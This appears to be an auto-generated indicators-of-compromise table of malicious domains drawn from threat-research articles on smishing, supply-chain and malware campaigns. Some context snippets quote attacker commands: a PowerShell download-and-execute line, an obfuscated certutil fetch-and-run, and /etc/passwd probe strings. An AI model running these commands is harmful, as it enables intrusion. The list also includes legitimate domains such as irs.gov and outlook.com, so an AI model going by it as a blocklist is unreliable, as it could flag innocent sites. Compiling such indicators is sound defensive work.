Indicators of compromise
1,890 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use
| Type | Indicator | Context | Article | First seen |
|---|---|---|---|---|
| domain | com-chargedae.world | ass.com-statementzz[.]world e-zpass.com-emea[.]top pikepass.com-chargedae[.]world e-zpass.com-etcoz[.]win e-zpassny.com-kien[.]top e-zpassn | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-emea.top | sny.com-pvbfd[.]win e-zpass.com-statementzz[.]world e-zpass.com-emea[.]top pikepass.com-chargedae[.]world e-zpass.com-etcoz[.]win e- | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-etcha.win | [.]com dhl.de-yiore[.]store usps.com-posewxts[.]top e-zpass.com-etcha[.]win usps.com-isjjz[.]top flde-lity.com-jw[.]icu e-zpass.com-t | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-etcoz.win | zpass.com-emea[.]top pikepass.com-chargedae[.]world e-zpass.com-etcoz[.]win e-zpassny.com-kien[.]top e-zpassny.com-xxai[.]vip sunpass | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-hbg.vip | n e-zpassny.com-kien[.]top e-zpassny.com-xxai[.]vip sunpass.com-hbg[.]vip usps.com-hzasr[.]bid e-zpassny.gov-tosz[.]live michigan.g | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-hzasr.bid | n[.]top e-zpassny.com-xxai[.]vip sunpass.com-hbg[.]vip usps.com-hzasr[.]bid e-zpassny.gov-tosz[.]live michigan.gov-imky[.]win e-zpass | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-isjjz.top | ]store usps.com-posewxts[.]top e-zpass.com-etcha[.]win usps.com-isjjz[.]top flde-lity.com-jw[.]icu e-zpass.com-tollbiler[.]icu e-zpas | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-jw.icu | ]top e-zpass.com-etcha[.]win usps.com-isjjz[.]top flde-lity.com-jw[.]icu e-zpass.com-tollbiler[.]icu e-zpassny.com-pvbfd[.]win e-z | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-kien.top | ass.com-chargedae[.]world e-zpass.com-etcoz[.]win e-zpassny.com-kien[.]top e-zpassny.com-xxai[.]vip sunpass.com-hbg[.]vip usps.com-h | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-lg.icu | tors of Compromise icloud.com-remove-device[.]top flde-lity.com-lg[.]icu michigan.gov-etczhh[.]cc utah.gov-etcfr[.]win irs.gov-tax | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-pay.online | -etcfr[.]win irs.gov-tax[.]cfd irs.org.gov-tax[.]icu anpost.com-pay[.]online kveesh6.il-363[.]com dhl.de-yiore[.]store usps.com-posewx | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-posewxts.top | pay[.]online kveesh6.il-363[.]com dhl.de-yiore[.]store usps.com-posewxts[.]top e-zpass.com-etcha[.]win usps.com-isjjz[.]top flde-lity.co | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-pvbfd.win | lde-lity.com-jw[.]icu e-zpass.com-tollbiler[.]icu e-zpassny.com-pvbfd[.]win e-zpass.com-statementzz[.]world e-zpass.com-emea[.]top pi | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-remove-device.top | the Cyber Threat Alliance . Indicators of Compromise icloud.com-remove-device[.]top flde-lity.com-lg[.]icu michigan.gov-etczhh[.]cc utah.gov- | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-statementzz.world | zpass.com-tollbiler[.]icu e-zpassny.com-pvbfd[.]win e-zpass.com-statementzz[.]world e-zpass.com-emea[.]top pikepass.com-chargedae[.]world e-z | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-tollbiler.icu | a[.]win usps.com-isjjz[.]top flde-lity.com-jw[.]icu e-zpass.com-tollbiler[.]icu e-zpassny.com-pvbfd[.]win e-zpass.com-statementzz[.]world | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com-xxai.vip | e-zpass.com-etcoz[.]win e-zpassny.com-kien[.]top e-zpassny.com-xxai[.]vip sunpass.com-hbg[.]vip usps.com-hzasr[.]bid e-zpassny.gov- | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | co-ykk.vip | ]live irs.gov-addpayment[.]info irs.gov-mo[.]net israeipost.co-ykk[.]vip canpost.id-89b98[.]com anpost.id-39732[.]info Additional | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | de-yiore.store | -tax[.]icu anpost.com-pay[.]online kveesh6.il-363[.]com dhl.de-yiore[.]store usps.com-posewxts[.]top e-zpass.com-etcha[.]win usps.com- | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gov-addpayment.info | ictims. For instance, a casual inspection of the domain irs.gov-addpayment[.]info could trick people into thinking they are navigating to i | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gov-etcfr.win | [.]top flde-lity.com-lg[.]icu michigan.gov-etczhh[.]cc utah.gov-etcfr[.]win irs.gov-tax[.]cfd irs.org.gov-tax[.]icu anpost.com-pay[.] | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gov-etczhh.cc | oud.com-remove-device[.]top flde-lity.com-lg[.]icu michigan.gov-etczhh[.]cc utah.gov-etcfr[.]win irs.gov-tax[.]cfd irs.org.gov-tax[.] | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gov-hzwy.live | xin ezpass.org-pvwh[.]xin ezpassnj.gov-mhmt[.]xin e-zpassny.gov-hzwy[.]live irs.gov-addpayment[.]info irs.gov-mo[.]net israeipost.co- | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gov-imky.win | vip usps.com-hzasr[.]bid e-zpassny.gov-tosz[.]live michigan.gov-imky[.]win e-zpass.org-yga[.]xin e-zpass.org-qac[.]xin ezpass.org-pv | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gov-mhmt.xin | [.]xin e-zpass.org-qac[.]xin ezpass.org-pvwh[.]xin ezpassnj.gov-mhmt[.]xin e-zpassny.gov-hzwy[.]live irs.gov-addpayment[.]info irs.g | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gov-mo.net | xin e-zpassny.gov-hzwy[.]live irs.gov-addpayment[.]info irs.gov-mo[.]net israeipost.co-ykk[.]vip canpost.id-89b98[.]com anpost.id- | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gov-tax.cfd | -lg[.]icu michigan.gov-etczhh[.]cc utah.gov-etcfr[.]win irs.gov-tax[.]cfd irs.org.gov-tax[.]icu anpost.com-pay[.]online kveesh6.il- | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gov-tax.icu | -etczhh[.]cc utah.gov-etcfr[.]win irs.gov-tax[.]cfd irs.org.gov-tax[.]icu anpost.com-pay[.]online kveesh6.il-363[.]com dhl.de-yiore | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gov-tosz.live | [.]vip sunpass.com-hbg[.]vip usps.com-hzasr[.]bid e-zpassny.gov-tosz[.]live michigan.gov-imky[.]win e-zpass.org-yga[.]xin e-zpass.org | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | id-39732.info | .]net israeipost.co-ykk[.]vip canpost.id-89b98[.]com anpost.id-39732[.]info Additional Resources Internet Crime Complaint Center (IC3 | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | id-89b98.com | ent[.]info irs.gov-mo[.]net israeipost.co-ykk[.]vip canpost.id-89b98[.]com anpost.id-39732[.]info Additional Resources Internet Crim | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | il-363.com | .]cfd irs.org.gov-tax[.]icu anpost.com-pay[.]online kveesh6.il-363[.]com dhl.de-yiore[.]store usps.com-posewxts[.]top e-zpass.com- | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | irs.gov | nfo could trick people into thinking they are navigating to irs[.]gov . Figure 3 shows the most popular prefixes of domain name | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | org-pvwh.xin | ky[.]win e-zpass.org-yga[.]xin e-zpass.org-qac[.]xin ezpass.org-pvwh[.]xin ezpassnj.gov-mhmt[.]xin e-zpassny.gov-hzwy[.]live irs.gov | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | org-qac.xin | ]live michigan.gov-imky[.]win e-zpass.org-yga[.]xin e-zpass.org-qac[.]xin ezpass.org-pvwh[.]xin ezpassnj.gov-mhmt[.]xin e-zpassny.g | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | org-yga.xin | d e-zpassny.gov-tosz[.]live michigan.gov-imky[.]win e-zpass.org-yga[.]xin e-zpass.org-qac[.]xin ezpass.org-pvwh[.]xin ezpassnj.gov- | The Smishing Deluge: China-Based Campaign Flooding Global Text Messages Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | clinic.site | . In this medical application, patients can use the API api.clinic[.]site/get_history?visit_id=XXXX to access the doctor visit note | Harnessing LLMs for Automating BOLA Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | nitesbr1.org | nload a VBScript file from the following URL: http:// kmbr1.nitesbr1[.]org/UserFiles/File/image/home.html This VBScript file yet aga | NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | 000webhostapp.com | ct System . Net . WebClient ) . DownloadFile ( 'https://881.000webhostapp[.]com/0_31.doc' , '%TEMP%\\AAA.exe' ) ; Start - Process ( '%TEM | The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | 000webhost.com | mmunication: ftp.byethost7[.]com ftp.byethost10[.]com files.000webhost[.]com Beginning in June 2018, we observed the OceanSalt malware | The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | 1apps.com | ^ e ^ r ^ tutil - urlca ^ che - spl ^ it - f http : //s8877.1apps[.]com/vip/1.txt && ren 1.txt 1.bat && 1.bat && exit This comman | The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | byethost10.com | hosts via FTP for C2 communication: ftp.byethost7[.]com ftp.byethost10[.]com files.000webhost[.]com Beginning in June 2018, we observe | The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | byethost7.com | with the following hosts via FTP for C2 communication: ftp.byethost7[.]com ftp.byethost10[.]com files.000webhost[.]com Beginning in | The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | bytehost31.org | ongs to the SYSCON malware family. It communicates with ftp.bytehost31[.]org via FTP for command and control (C2). Figure 2 SYSCON net | The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | nknews.org | article that was published on the same day as the attack by NKNews[.]org. The article in question discusses diplomatic ties betwee | The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | webhost.com | byethost7[.]com ftp.byethost10[.]com files.000webhost[.]com webhost[.]com 61.14.210[.]72:7117 | The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | webmail-koryogroup.com | com/1.txt http://bluemountain.1apps[.]com/1.txt https://www.webmail-koryogroup[.]com/keep/1.txt http://filer1.1apps[.]com/1.txt ftp.byethost7[ | The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | yandex.ru | shing email was sent from the email address of yuri.sidorav@yandex[.]ru to a high ranking individual within a British government | The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | affiliatecollective.club | } Campaign Identifier: '\xf1\xaf\x02i.]\xa4\xe0' C2 Server: affiliatecollective[.]club C2 Port: 443 Hash Value: 0304674e9876530dfbea5a9b4fec7b98 | Cardinal RAT Sins Again, Targets Israeli Fin Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | 1ma.xyz | mpts that involved a callback URL that contained the domain 1ma[.]xyz , as seen in the following example: <redacted>.com.80.ref | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | automationyesterday.com | 346,888 195.54.160[.]149 250,042 canarytokens[.]com 198,954 automationyesterday[.]com 166,206 45.83.193[.]150 120,707 64.39.98[.]200 118,860 pr | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | burpcollaborator.net | .]159 80,075 interactsh[.]com 68,959 5.101.118[.]127 51,515 burpcollaborator[.]net 51,066 31.131.16[.]127 48,119 45.66.8[.]12 46,753 185.246 | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | canarytokens.com | [.]in 552,521 45.83.64[.]1 346,888 195.54.160[.]149 250,042 canarytokens[.]com 198,954 automationyesterday[.]com 166,206 45.83.193[.]150 | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | interact.sh | 36,563,784 nessus[.]org 14,638,414 172.16.0.0/12 1,818,036 interact[.]sh 852,778 oob[.]li 571,042 sploit[.]in 552,521 45.83.64[.]1 | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | interactsh.com | rt[.]tech 83,875 upguard[.]com 83,379 193.3.19[.]159 80,075 interactsh[.]com 68,959 5.101.118[.]127 51,515 burpcollaborator[.]net 51,0 | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | nessus.org | ity scanning services are represented in this list, such as nessus[.]org as the top callback involving a remote location. Domain/I | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | oob.li | rg 14,638,414 172.16.0.0/12 1,818,036 interact[.]sh 852,778 oob[.]li 571,042 sploit[.]in 552,521 45.83.64[.]1 346,888 195.54.1 | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | praetorian.com | ]com 166,206 45.83.193[.]150 120,707 64.39.98[.]200 118,860 praetorian[.]com 115,739 192.168.0.0/16 86,513 securitysupport[.]tech 83,8 | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | securitysupport.tech | ]200 118,860 praetorian[.]com 115,739 192.168.0.0/16 86,513 securitysupport[.]tech 83,875 upguard[.]com 83,379 193.3.19[.]159 80,075 interac | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | sploit.in | .16.0.0/12 1,818,036 interact[.]sh 852,778 oob[.]li 571,042 sploit[.]in 552,521 45.83.64[.]1 346,888 195.54.160[.]149 250,042 can | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | upguard.com | 115,739 192.168.0.0/16 86,513 securitysupport[.]tech 83,875 upguard[.]com 83,379 193.3.19[.]159 80,075 interactsh[.]com 68,959 5.10 | Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | discordapp.com | osted file is retrieved from the following URL: hxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbopbh. | Threat Brief: Ongoing Russia and Ukraine Cyber Activity Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | 3cx.com | w glcloudservice[.]com/v1/status pbxsources[.]com/queue www.3cx[.]com/blog/event-trainings/ Note that the www.3cx[.]com URL abo | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | akamaicontainer.com | iofactory.com|.*zacharryblogs.com" OR dns_query_name ~ = ".*akamaicontainer.com|.*akamaitechcloudservices.com|.*azuredeploystore.com|.*azur | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | akamaitechcloudservices.com | 62a88896c57bbe3b6456bd090 icon10.ico and icon11.ico hxxps://akamaitechcloudservices[.]com/v2/storage d51a790d187439ce030cf763237e992e9196e9aa41797a | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | azuredeploystore.com | 1720d77c47b97d97c3b0cf43ade5d96bf724639bd icon4.ico hxxps://azuredeploystore[.]com/cloud/services c13d49ed325dec9551906bafb6de9ec947e5ff936e | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | azureonlinestorage.com | 237e992e9196e9aa41797a94956681b6279d1b9a icon12.ico hxxps://azureonlinestorage[.]com/azure/storage 4e08e4ffc699e0a1de4a5225a0b4920933fbb9cf123 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | githubusercontent.com | s a randomly generated number between 1 and 15: hxxps://raw.githubusercontent[.]com/IconStorages/images/main/icon[1-15].ico This request look | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | glcloudservice.com | 0242efd78fd4ed0c344ac6469611ec72defa6b2d icon14.ico hxxps://glcloudservice[.]com/v1/console f47c883f59a4802514c57680de3f41f690871e26f250c6 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | msedgepackageinfo.com | a0b4920933fbb9cf123cde33e1674fde6d61444f icon13.ico hxxps://msedgepackageinfo[.]com/microsoft-edge 8c0b7d90f14c55d4f1d0f17e0242efd78fd4ed0c34 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | msstorageazure.com | f4771e897fb5a617998aa4876e0e1baa5fbb8e25c icon1.ico hxxps://msstorageazure[.]com/window d459aa0a63140ccc647e9026bfd1fccd4c310c262a88896c57 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | msstorageboxes.com | fb6de9ec947e5ff936e7e40877feb2ba4bb176396 icon5.ico hxxps://msstorageboxes[.]com/office f1bf4078141d7ccb4f82e3f4f1c3571ee6dd79b5335eb0e046 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | officeaddons.com | 4f1c3571ee6dd79b5335eb0e0464f877e6e6e3182 icon6.ico hxxps://officeaddons[.]com/technologies 2487b4e3c950d56fb15316245b3c51fbd70717838f6f | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | officestoragebox.com | 33a48e228c32bcf26bd98e51310efd48e80c1789f icon2.ico hxxps://officestoragebox[.]com/api/session 268d4e399dbbb42ee1cd64d0da72c57214ac987efbb50 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | pbxcloudeservices.com | 10ce22d71e05b20bad74d53fae158dc752a65782e icon9.ico hxxps://pbxcloudeservices[.]com/phonesystem Table 1. Icon files hosted at GitHub account | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | pbxphonenetwork.com | acharryblogs[.]com/xmlquery pbxcloudeservices[.]com/network pbxphonenetwork[.]com/phone akamaitechcloudservices[.]com/v2/fileapi azureonlin | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | pbxsources.com | de3f41f690871e26f250c6e890651ba71027e4d3 icon15.ico hxxps://pbxsources[.]com/exchange 2c9957ea04d033d68b769f333a48e228c32bcf26bd98e513 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | sourceslabs.com | 45b3c51fbd70717838f6f82f32db2efcc4d9da6de icon7.ico hxxps://sourceslabs[.]com/downloads e059c8c8b01d6f3af32257fc2b6fe188d5f4359c308b368 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | visualstudiofactory.com | 0da72c57214ac987efbb509c46cc57ea6b214beca icon3.ico hxxps://visualstudiofactory[.]com/workload c62dce8a77d777774e059cf1720d77c47b97d97c3b0cf43a | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | zacharryblogs.com | c2b6fe188d5f4359c308b3684b1e0db2071c3425c icon8.ico hxxps://zacharryblogs[.]com/feed d0f1984b4fe896d0024533510ce22d71e05b20bad74d53fae158 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | bbvanet.com.mx | bancadigital.monex[.]com[.]mx nixe.ixe[.]com[.]mx empresas.bbvanet[.]com[.]mx These hosts align toward financial institutions, financ | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | hsbc.com.mx | s where ?? represents unidentified SHA256 hashes: www.??.??.hsbc[.]com[.]mx www1.secure.hsbcnet[.]com bancadigital.monex[.]com[.]mx | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | hsbcnet.com | tified SHA256 hashes: www.??.??.hsbc[.]com[.]mx www1.secure.hsbcnet[.]com bancadigital.monex[.]com[.]mx nixe.ixe[.]com[.]mx empresa | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ixe.com.mx | ww1.secure.hsbcnet[.]com bancadigital.monex[.]com[.]mx nixe.ixe[.]com[.]mx empresas.bbvanet[.]com[.]mx These hosts align toward fi | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | monex.com.mx | ?.??.hsbc[.]com[.]mx www1.secure.hsbcnet[.]com bancadigital.monex[.]com[.]mx nixe.ixe[.]com[.]mx empresas.bbvanet[.]com[.]mx These h | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | trilivok.com | 6 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 hxxps : //trilivok[.]com/4g3031ar0/cb6y1dh/it.php hxxp : //trilivok[.]com/4g3031ar | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | att.net | enabled? Or is the user meant not to notice a redirect from att.net to att.someotherdomain.net or something? Andrew Olpin • Aug | Hacking Public Wi-Fi DNS to Steal Credentials Schneier on Security | · Aug 17, 2026 |
| domain | att.someotherdomain.net | is the user meant not to notice a redirect from att.net to att.someotherdomain.net or something? Andrew Olpin • August 17, 2026 9:32 AM Yes, t | Hacking Public Wi-Fi DNS to Steal Credentials Schneier on Security | · Aug 17, 2026 |
| domain | foo.com | edLight • August 17, 2026 6:54 PM Uhhh. Wait a sec… I go to foo.com on my computer’s web-browswer. DNS lookup is redirected and | Hacking Public Wi-Fi DNS to Steal Credentials Schneier on Security | · Aug 17, 2026 |
| domain | www.schneier.com | em, three of the five browsers on my laptop complained that www[dot]schneier[dot]com was insecure, and somebody might be spoofing it. I | Hacking Public Wi-Fi DNS to Steal Credentials Schneier on Security | · Aug 17, 2026 |
| domain | burpcollaborator.net | sswd cat+/etc/passwd id ifconfig ipconfig ping%20[redacted].burpcollaborator[.]net Observed in the Wild Our Spring Core Remote Code Executio | CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ggdd.co.uk | t general scanning activity. ls nslookup%20[redacted].test6.ggdd[.]co[.]uk nslookup+[redacted].test6.ggdd[.]co[.]uk ping%20[redact | CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | outlook.com | OWA-ExplicitLogonUser that has a value of owa/mastermailbox@outlook[.]com . The header value is removed from the URL during process | Threat Brief: OWASSRF Vulnerability Exploitation Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | checkblacklistwords.eu | eation with WildFire and Advanced URL Filtering. The domain checkblacklistwords[.]eu used to host the various files needed for infection and t | Fake CVE-2023 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | streamable.com | . The instructions also include a link to a video hosted on streamable[.]com . The video is no longer hosted at the URL within the REA | Fake CVE-2023 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | cdn-sina.tw | ckers attempted to create a connection to the domain images.cdn-sina[.]tw to download a file named scvhost.txt . This file was a Co | Persistent Attempts at Cyberespionage Against Southeast Asian Government Target Have Links to Alloy Taurus Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | b8pjmgd6.com | pdate.fjke5oe[.]com www.i5y3dl[.]com www.hbsanews[.]com www.b8pjmgd6[.]com www.zimbra[.]page www.ggrdl4[.]com www.gm4rys[.]com Archi | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | fjke5oe.com | anhlab.exe C:\Users\hack\Desktop\uuid\uu\Release\uu.pdb www.fjke5oe[.]com Nov. 9, 2022 5064b2a8fcfc58c18f53773411f41824b7f6c2675c1d | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ggrdl4.com | www.hbsanews[.]com www.b8pjmgd6[.]com www.zimbra[.]page www.ggrdl4[.]com www.gm4rys[.]com Archives Related to PubLoad Using V6-win | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gm4rys.com | m www.b8pjmgd6[.]com www.zimbra[.]page www.ggrdl4[.]com www.gm4rys[.]com Archives Related to PubLoad Using V6-winsp1-wuredir SHA25 | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.